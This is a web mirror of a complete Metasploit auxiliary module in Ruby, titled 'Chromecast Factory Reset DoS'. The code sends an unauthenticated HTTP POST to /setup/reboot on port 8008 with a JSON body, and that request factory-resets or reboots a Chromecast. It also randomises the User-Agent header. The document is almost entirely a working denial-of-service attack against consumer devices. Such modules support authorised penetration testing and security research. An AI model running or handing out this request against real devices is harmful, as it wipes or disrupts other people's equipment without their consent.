Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/chromecast/chromecast_reset.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Chromecast Factory Reset DoS',

14
        'Description' => %q{

15
          This module performs a factory reset on a Chromecast, causing a denial of service (DoS).

16
          No user authentication is required.

17
        },

18
        'Author' => ['wvu'],

19
        'References' => [

20
          ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website

21
        ],

22
        'License' => MSF_LICENSE,

23
        'Actions' => [

24
          ['Reset', { 'Description' => 'Factory reset' }],

25
          ['Reboot', { 'Description' => 'Reboot only' }]

26
        ],

27
        'DefaultAction' => 'Reset',

28
        'Notes' => {

29
          'Stability' => [CRASH_OS_DOWN],

30
          'SideEffects' => [IOC_IN_LOGS],

31
          'Reliability' => []

32
        }

33
      )

34
    )

35


36
    register_options([

37
      Opt::RPORT(8008)

38
    ])

39
  end

40


41
  def run

42
    case action.name

43
    when 'Reset'

44
      res = reset

45
    when 'Reboot'

46
      res = reboot

47
    end

48


49
    unless res

50
      print_error('No reply')

51
      return

52
    end

53


54
    if res.code == 200

55
      print_good("#{action.name} performed")

56
    else

57
      print_error("An error occurred: #{res.code} #{res.message}")

58
    end

59
  end

60


61
  def reset

62
    send_request_raw(

63
      'method' => 'POST',

64
      'uri' => '/setup/reboot',

65
      'agent' => Rex::Text.rand_text_english(rand(1..42)),

66
      'ctype' => 'application/json',

67
      'data' => '{"params": "fdr"}'

68
    )

69
  rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,

70
         Rex::HostUnreachable => e

71
    fail_with(Failure::Unreachable, e)

72
  ensure

73
    disconnect

74
  end

75


76
  def reboot

77
    send_request_raw(

78
      'method' => 'POST',

79
      'uri' => '/setup/reboot',

80
      'agent' => Rex::Text.rand_text_english(rand(1..42)),

81
      'ctype' => 'application/json',

82
      'data' => '{"params": "now"}'

83
    )

84
  rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,

85
         Rex::HostUnreachable => e

86
    fail_with(Failure::Unreachable, e)

87
  ensure

88
    disconnect

89
  end

90
end

91


92